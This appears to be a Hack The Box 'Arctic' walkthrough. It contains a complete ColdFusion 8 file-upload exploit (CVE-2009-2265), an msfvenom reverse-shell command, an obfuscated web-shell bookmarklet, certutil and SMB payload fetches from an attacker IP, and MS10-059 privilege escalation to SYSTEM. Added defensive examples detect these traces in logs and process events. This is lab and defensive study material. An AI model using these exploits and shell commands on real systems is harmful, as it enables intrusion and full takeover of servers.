Hackthebox:Arctic Walkthrough
Prerequisites
msfvenom is used; skip this one if you'd rather not read about that.
Information gathering in the browser, in particular spotting service details yourself rather than relying too much on tools
MS10-059, smbserver, JSP reverse shell
Information gathering and getting a foothold
Not sure why, but the network to the HTB machines has been a bit unstable lately.
Start with a quick nmap scan for open ports. -Pn skips the ping probe and host discovery, so a firewall that drops pings does not make nmap mark the host as down.
nmap -Pn 10.10.10.11
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-08 12:08 CST
Nmap scan report for 10.10.10.11
Host is up (0.29s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
8500/tcp  open  fmtp
49154/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 20.83 seconds
Then start a more detailed scan; there is nothing else to go on yet, so nmap's verbose output is all we have.
nmap -sC -sV -Pn -p- 10.10.10.11
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
All we can do is open these ports in a browser and see whether any of them serves a web application: http://10.10.10.11:8500/ and http://10.10.10.11:49154/
There is a web service on http://10.10.10.11:8500/.
Check whether it is a known CMS or a component with known vulnerabilities.
whatweb -vv http://10.10.10.11:8500/
http://10.10.10.11:8500/ [200]
Identifying: http://10.10.10.11:8500/
HTTP-Status: 200
[["IP", [{:string=>"10.10.10.11", :certainty=>100}]],["Title", [{:name=>"page title", :string=>"Index of /", :certainty=>100}]],["Country", [{:string=>"RESERVED", :module=>"ZZ", :certainty=>100}]],["Index-Of",[{:text=>"<title>Index of /",:regexp_compiled=>/<title>Index\ of\ \//,:certainty=>100}]],["HTTPServer",[{:name=>"server string", :string=>"JRun Web Server", :certainty=>100}]]]
WhatWeb report for http://10.10.10.11:8500/
Status : 200 OK
Title : Index of /
IP : 10.10.10.11
Country : RESERVED, ZZ
Summary : Index-Of, HTTPServer[JRun Web Server]
Detected Plugins:
[ HTTPServer ]
HTTP server header string. This plugin also attempts to identify the operating system from the server header.
String : JRun Web Server (from server string)
{:name=>"server string", :certainty=>100, :string=>"JRun Web Server"}
[ Index-Of ]
Index of
{:certainty=>100}
Google Dorks: (1)
HTTP Headers:
HTTP/1.0 200 OK
Date: Wed, 09 Dec 2020 13:26:00 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Server: JRun Web Server
That information is not much use on its own, so read through the files looking for clues. Reading http://10.10.10.11:8500/CFIDE/Application.cfm gives the first real lead.
The component is probably ColdFusion; search for related vulnerabilities.
Visiting http://10.10.10.11:8500/CFIDE/administrator/ shows that the version is 8.
There is a matching CVE, CVE-2009-2265. After a long search I found an exploit, in the end on the HTB forum: https://forum.hackthebox.eu/discussion/116/python-coldfusion-8-0-1-arbitrary-file-upload
#!/usr/bin/env python3
# Exploit Title: ColdFusion 8.0.1 - Arbitrary File Upload
# Date: 2017-10-16
# Exploit Author: Alexander Reid
# Vendor Homepage: http://www.adobe.com/products/ColdFusion-family.html
# Version: ColdFusion 8.0.1
# CVE: CVE-2009-2265
#
# Description:
# A standalone proof of concept that demonstrates an arbitrary file upload vulnerability in ColdFusion 8.0.1
# Uploads the specified jsp file to the remote server.
#
# Usage: ./exploit.py <target ip> <target port> [/path/to/ColdFusion] </path/to/payload.jsp>
# Example: ./exploit.py 127.0.0.1 8500 /home/arrexel/shell.jsp
import os
import sys

import requests

try:
    ip = sys.argv[1]
    port = sys.argv[2]
    if len(sys.argv) == 5:
        # Optional ColdFusion base path given; the payload is the last argument
        path = sys.argv[3]
        filename = os.path.basename(sys.argv[4])
        with open(sys.argv[4], 'r') as payload:
            body = payload.read()
    else:
        path = ""
        filename = os.path.basename(sys.argv[3])
        with open(sys.argv[3], 'r') as payload:
            body = payload.read()
except IndexError:
    print('Usage: ./exploit.py <target ip/hostname> <target port> [/path/to/ColdFusion] </path/to/payload.jsp>')
    print('Example: ./exploit.py example.com 8500 /home/arrexel/shell.jsp')
    sys.exit(-1)

basepath = "http://" + ip + ":" + port + path

print('Sending payload...')
print('Base filename is {}'.format(filename))
try:
    # The upload itself carries a harmless .txt name; the real name comes from CurrentFolder,
    # and the trailing %00 cuts off whatever the connector appends after it.
    req = requests.post(
        basepath + "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/{}%00".format(filename),
        files={'newfile': ('sploit.txt', body, 'application/x-java-archive')},
        timeout=30,  # without a timeout the requests.Timeout branch below could never trigger
    )
    print('Base path is {}'.format(basepath))
    if req.status_code == 200:
        print('Successfully uploaded payload!\nFind it at {}/userfiles/file/{}'.format(basepath, filename))
    else:
        print('Failed to upload payload... {} {}'.format(str(req.status_code), req.reason))
except requests.Timeout:
    print('Failed to upload payload... Request timed out')
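The same request seen from the defender's side, as an added example that is not part of the walkthrough or the exploit above: the upload goes to the FCKeditor connector under /CFIDE/scripts/ajax/, names the file in the CurrentFolder parameter and terminates it with %00, and the result is then fetched from /userfiles/file/. The Python below scans web access-log lines for exactly those traces. The log lines are constructed for the example, not captured from the box, and the combined-log format and severity labels are my own choices.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines in combined-log style (not captured from the box). The second line mirrors
# the upload request the exploit sends; the fourth is the uploaded file being fetched afterwards.
SAMPLE_LOG = """\
10.10.14.4 - - [09/Dec/2020:13:26:00 +0000] "GET /CFIDE/administrator/ HTTP/1.1" 200 5120
10.10.14.4 - - [09/Dec/2020:13:27:11 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/shell.jsp%00 HTTP/1.1" 200 312
192.168.1.20 - - [09/Dec/2020:13:28:02 +0000] "GET /index.cfm HTTP/1.1" 200 2048
10.10.14.4 - - [09/Dec/2020:13:29:40 +0000] "GET /userfiles/file/shell.jsp HTTP/1.1" 200 77
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
CONNECTOR_PREFIX = "/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/"
SCRIPT_EXTS = (".jsp", ".jspx", ".cfm", ".cfml")
HIGH = {"null-byte-in-currentfolder", "script-under-userfiles"}


def classify(line):
    """Return a finding record for one log line, or None when nothing suspicious matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = parts.path.lower()
    # parse_qs percent-decodes values, so a %00 in the query shows up as a real NUL byte here
    query = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    if path.startswith(CONNECTOR_PREFIX):
        findings.append("fckeditor-connector")
        if query.get("Command", [""])[0].lower() == "fileupload":
            findings.append("file-upload-command")
        if "\x00" in query.get("CurrentFolder", [""])[0]:
            findings.append("null-byte-in-currentfolder")
    if path.startswith("/userfiles/file/") and path.endswith(SCRIPT_EXTS):
        findings.append("script-under-userfiles")
    if path.startswith("/cfide/administrator"):
        findings.append("admin-console-access")
    if not findings:
        return None
    return {
        "ip": m.group("ip"),
        "timestamp": m.group("ts"),
        "status": int(m.group("status")),
        "severity": "high" if HIGH & set(findings) else "medium",
        "findings": findings,
    }


def scan_log(text):
    """Run classify() over every line and keep only the lines that produced findings."""
    return [rec for rec in (classify(line) for line in text.splitlines()) if rec]


if __name__ == "__main__":
    for rec in scan_log(SAMPLE_LOG):
        print(rec["severity"].upper(), rec["ip"], rec["timestamp"], ", ".join(rec["findings"]))
```

The null byte is the decisive signal: a legitimate FCKeditor client never sends one in CurrentFolder, so that single finding is enough to rate the line high even if the upload was later cleaned up. Any script extension served from /userfiles/file/ is rated high for the same reason, while plain connector traffic and admin-console hits are only medium and are mainly useful as context around the high-severity lines.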
Looking at the usage, it needs a JSP web shell; here I used the one that ships with Kali, /usr/share/webshells/cmdjsp.jsp.
python exploit.py 10.10.10.11 8500 /home/bot/shell.jsp
But it failed... I really could not get it to work, so I then tried this shell that someone abroad recommended.
Add the following code to the bookmarks bar as a link, then click it while on the cmd.jsp page.
javascript:{window.localStorage.embed=window.atob("ZG9jdW1lbnQud3JpdGUoIjxwPiIpOw0KdmFyIGh0bWwgPSAiPGZvcm0gbWV0aG9kPXBvc3QgYWN0aW9uPSdjbWQuanNwJz5cDQo8aW5wdXQgbmFtZT0nYycgdHlwZT10ZXh0PjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nUnVuJz5cDQo8L2Zvcm0+PGhyPlwNCjxmb3JtIGFjdGlvbj0nY21kLmpzcCcgbWV0aG9kPXBvc3Q+XA0KVXBsb2FkIGRpcjogPGlucHV0IG5hbWU9J2EnIHR5cGU9dGV4dCB2YWx1ZT0nLic+PGJyPlwNClNlbGVjdCBhIGZpbGUgdG8gdXBsb2FkOiA8aW5wdXQgbmFtZT0nbicgdHlwZT0nZmlsZScgaWQ9J2YnPlwNCjxpbnB1dCB0eXBlPSdoaWRkZW4nIG5hbWU9J2InIGlkPSdiJz5cDQo8aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0nVXBsb2FkJz5cDQo8L2Zvcm0+PGhyPiI7DQp2YXIgZGl2ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnZGl2Jyk7DQpkaXYuaW5uZXJIVE1MID0gaHRtbDsNCmRvY3VtZW50LmJvZHkuaW5zZXJ0QmVmb3JlKGRpdiwgZG9jdW1lbnQuYm9keS5maXJzdENoaWxkKTsNCg0KdmFyIGhhbmRsZUZpbGVTZWxlY3QgPSBmdW5jdGlvbihldnQpIHsNCiAgICB2YXIgZmlsZXMgPSBldnQudGFyZ2V0LmZpbGVzOw0KICAgIHZhciBmaWxlID0gZmlsZXNbMF07DQoNCiAgICBpZiAoZmlsZXMgJiYgZmlsZSkgew0KICAgICAgICB2YXIgcmVhZGVyID0gbmV3IEZpbGVSZWFkZXIoKTsNCg0KICAgICAgICByZWFkZXIub25sb2FkID0gZnVuY3Rpb24ocmVhZGVyRXZ0KSB7DQogICAgICAgICAgICB2YXIgYmluYXJ5U3RyaW5nID0gcmVhZGVyRXZ0LnRhcmdldC5yZXN1bHQ7DQogICAgICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnYicpLnZhbHVlID0gYnRvYShiaW5hcnlTdHJpbmcpOw0KICAgICAgICB9Ow0KDQogICAgICAgIHJlYWRlci5yZWFkQXNCaW5hcnlTdHJpbmcoZmlsZSk7DQogICAgfQ0KfTsNCmlmICh3aW5kb3cuRmlsZSAmJiB3aW5kb3cuRmlsZVJlYWRlciAmJiB3aW5kb3cuRmlsZUxpc3QgJiYgd2luZG93LkJsb2IpIHsNCiAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnZicpLmFkZEV2ZW50TGlzdGVuZXIoJ2NoYW5nZScsIGhhbmRsZUZpbGVTZWxlY3QsIGZhbHNlKTsNCn0gZWxzZSB7DQogICAgYWxlcnQoJ1RoZSBGaWxlIEFQSXMgYXJlIG5vdCBmdWxseSBzdXBwb3J0ZWQgaW4gdGhpcyBicm93c2VyLicpOw0KfQ==");eval(window.localStorage.embed);};void(0);
That kept throwing errors too; I tried many variants and all of them failed, so in the end I fell back to a shell generated with msfvenom.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.4 LPORT=1234 -f raw > hello.jsp
Start an nc listener locally, open the uploaded file in the browser, and the shell comes back.
Privilege escalation
Once again, windows-exploit-suggester.
sudo python windows-exploit-suggester.py --database 2020-12-08-mssb.xls --systeminfo Arctic.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
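windows-exploit-suggester works by comparing the KB numbers in a systeminfo dump against the bulletins in the mssb spreadsheet; here it found 0 hotfixes, so every bulletin for the OS is listed. The following is an added example, not the tool's own code and not from the walkthrough: a small patch-gap checker that parses systeminfo output and reports which of the bulletins listed above are missing, and which of those fix an elevation-of-privilege flaw. The bulletin ids, KB numbers and titles are taken from the suggester output above; the two systeminfo excerpts are constructed (the host name is a placeholder), and the real Arctic.txt is not reproduced.

```python
import re

# Security bulletins reported for this host by windows-exploit-suggester, with the KB each one installs
# (bulletin ids, KB numbers and titles as printed in the suggester output).
BULLETINS = {
    "MS13-009": ("KB2792100", "Cumulative Security Update for Internet Explorer"),
    "MS13-005": ("KB2778930", "Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege"),
    "MS12-037": ("KB2699988", "Cumulative Security Update for Internet Explorer"),
    "MS11-011": ("KB2393802", "Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege"),
    "MS10-073": ("KB981957", "Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege"),
    "MS10-061": ("KB2347290", "Vulnerability in Print Spooler Service Could Allow Remote Code Execution"),
    "MS10-059": ("KB982799", "Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege"),
    "MS10-047": ("KB981852", "Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege"),
    "MS10-002": ("KB978207", "Cumulative Security Update for Internet Explorer"),
    "MS09-072": ("KB976325", "Cumulative Security Update for Internet Explorer"),
}

# Constructed systeminfo excerpts (not the real Arctic.txt): one with no hotfixes, one with three installed.
SYSTEMINFO_UNPATCHED = """\
Host Name:                 WEBSRV01
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
"""

SYSTEMINFO_PARTIAL = """\
Host Name:                 WEBSRV01
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB982799
                           [02]: KB2347290
                           [03]: KB981957
"""

FIELD_RE = re.compile(r"^(OS Name|OS Version|System Type):\s+(.*?)\s*$", re.M)
KB_RE = re.compile(r"\bKB\d+\b")


def parse_systeminfo(text):
    """Extract the OS fields and the set of installed KB numbers from a systeminfo dump."""
    info = {key.lower().replace(" ", "_"): value for key, value in FIELD_RE.findall(text)}
    info["hotfixes"] = set(KB_RE.findall(text))
    return info


def missing_bulletins(info, bulletins=BULLETINS):
    """Bulletins whose KB is not in the installed set, sorted by bulletin id."""
    return sorted(b for b, (kb, _) in bulletins.items() if kb not in info["hotfixes"])


def local_privesc_gaps(info, bulletins=BULLETINS):
    """The missing bulletins that fix an elevation-of-privilege flaw: the ones a foothold would be used against next."""
    return [b for b in missing_bulletins(info, bulletins) if "Elevation of Privilege" in bulletins[b][1]]


if __name__ == "__main__":
    for label, dump in (("unpatched", SYSTEMINFO_UNPATCHED), ("partial", SYSTEMINFO_PARTIAL)):
        info = parse_systeminfo(dump)
        print(label, info["os_version"], "missing:", missing_bulletins(info))
        print(label, "local privesc gaps:", local_privesc_gaps(info))
```

One caveat a real checker has to handle and this one does not: later cumulative updates supersede earlier KBs, so a host can be protected against a bulletin without that bulletin's own KB appearing in systeminfo. The suggester's spreadsheet carries that supersedence data; a plain KB-set comparison like this will over-report on a host that is patched by newer rollups.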
certutil -urlcache -f http://10.10.14.4/JuicyPotato.exe JuicyPotato.exe
But that download failed, so I had to fetch the file over SMB with smbserver instead.
Run this locally to act as the SMB server:
sudo smbserver.py share `pwd`
In the end I used MS10-059; this is a precompiled build.
net use \\10.10.14.4\share
copy \\10.10.14.4\share\MS10-059.exe
First, listen on port 5555 with nc on the local machine.
In the shell, run: MS10-059.exe 10.10.14.4 5555
10.10.10.11: inverse host lookup failed: Unknown host
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.11] 50197
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\ColdFusion8\runtime\bin>whoami
whoami
nt authority\system

C:\ColdFusion8\runtime\bin>
Below is the privilege-escalation attempt that failed.
Back in the earlier shell:
net use \\10.10.14.4\share
copy \\10.10.14.4\share\JuicyPotato.exe
Run JuicyPotato.exe; both of the following attempts failed:
JuicyPotato.exe -z -l !port! -c %%i >> result.log
JuicyPotato.exe -t t -p c:\windows\system32\cmd.exe -l 1337 -c {03e15b2e-cca6-451c-8fb0-1e2ee37a27dd}
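Seen from the defender's side, the tooling in this section leaves distinctive process-creation telemetry: the web application process spawning cmd.exe, certutil -urlcache fetching over HTTP, net use and copy against a UNC path that is a bare IP address, and a potato-style binary passing a CLSID with -c and a program with -p. The following is an added example, not from the walkthrough: detection rules in Python run over constructed Sysmon-style process events. The events are constructed from the commands shown above; the jrun.exe parent path is an assumption based on the C:\ColdFusion8\runtime\bin directory seen in the shell prompt, and the benign certutil event is included to show that the rules do not fire on ordinary administrative use.

```python
import re

# Constructed Sysmon-style process-creation events (parent image, image, command line); not telemetry from the box.
# The jrun.exe parent path is an assumption based on the C:\ColdFusion8\runtime\bin directory seen in the shell.
EVENTS = [
    {"parent": r"C:\ColdFusion8\runtime\bin\jrun.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -f http://10.10.14.4/JuicyPotato.exe JuicyPotato.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use \\10.10.14.4\share"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c copy \\10.10.14.4\share\MS10-059.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\ColdFusion8\runtime\bin\JuicyPotato.exe",
     "cmdline": r"JuicyPotato.exe -t t -p c:\windows\system32\cmd.exe -l 1337 -c {03e15b2e-cca6-451c-8fb0-1e2ee37a27dd}"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -hashfile C:\tools\setup.msi SHA256"},  # benign admin use, must not alert
]

CLSID_RE = re.compile(r"-c\s+\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}", re.I)
UNC_IP_RE = re.compile(r"\\\\(\d{1,3}(?:\.\d{1,3}){3})\\")
SHELLS = {"cmd.exe", "powershell.exe"}
WEB_APP_DIR = "c:\\coldfusion8\\"  # install directory of the web application process


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def web_app_spawned_shell(ev):
    """A shell started by the web application process: what a web shell or reverse shell looks like."""
    return ev["parent"].lower().startswith(WEB_APP_DIR) and basename(ev["image"]) in SHELLS


def certutil_download(ev):
    """certutil used as a download tool (-urlcache with an http(s) URL)."""
    cl = ev["cmdline"].lower()
    return basename(ev["image"]) == "certutil.exe" and "-urlcache" in cl and "http" in cl


def unc_path_to_ip(ev):
    """net use / copy against \\\\<ip>\\share: a file transfer over SMB to an arbitrary host."""
    return UNC_IP_RE.search(ev["cmdline"]) is not None


def clsid_impersonation_tool(ev):
    """Potato-style tooling: a CLSID passed with -c together with a program to launch via -p."""
    cl = ev["cmdline"]
    return CLSID_RE.search(cl) is not None and re.search(r"-p\s+\S+", cl) is not None


RULES = [
    ("web-app-spawned-shell", web_app_spawned_shell),
    ("certutil-urlcache-download", certutil_download),
    ("unc-path-to-ip", unc_path_to_ip),
    ("clsid-impersonation-tool", clsid_impersonation_tool),
]


def evaluate(events):
    """Return one alert per event that matches at least one rule, with the names of the rules that fired."""
    alerts = []
    for ev in events:
        hits = [name for name, rule in RULES if rule(ev)]
        if hits:
            alerts.append({"image": ev["image"], "cmdline": ev["cmdline"], "rules": hits})
    return alerts


if __name__ == "__main__":
    for alert in evaluate(EVENTS):
        print(", ".join(alert["rules"]), "<-", alert["cmdline"])
```

The first rule is the one that matters most on a host like this: a web server's service account should never have cmd.exe as a child, and that single event precedes everything else in the chain, including the SYSTEM shell obtained with MS10-059. The other three rules are noisier on their own but become high-confidence when they follow a web-app-spawned-shell alert from the same process tree.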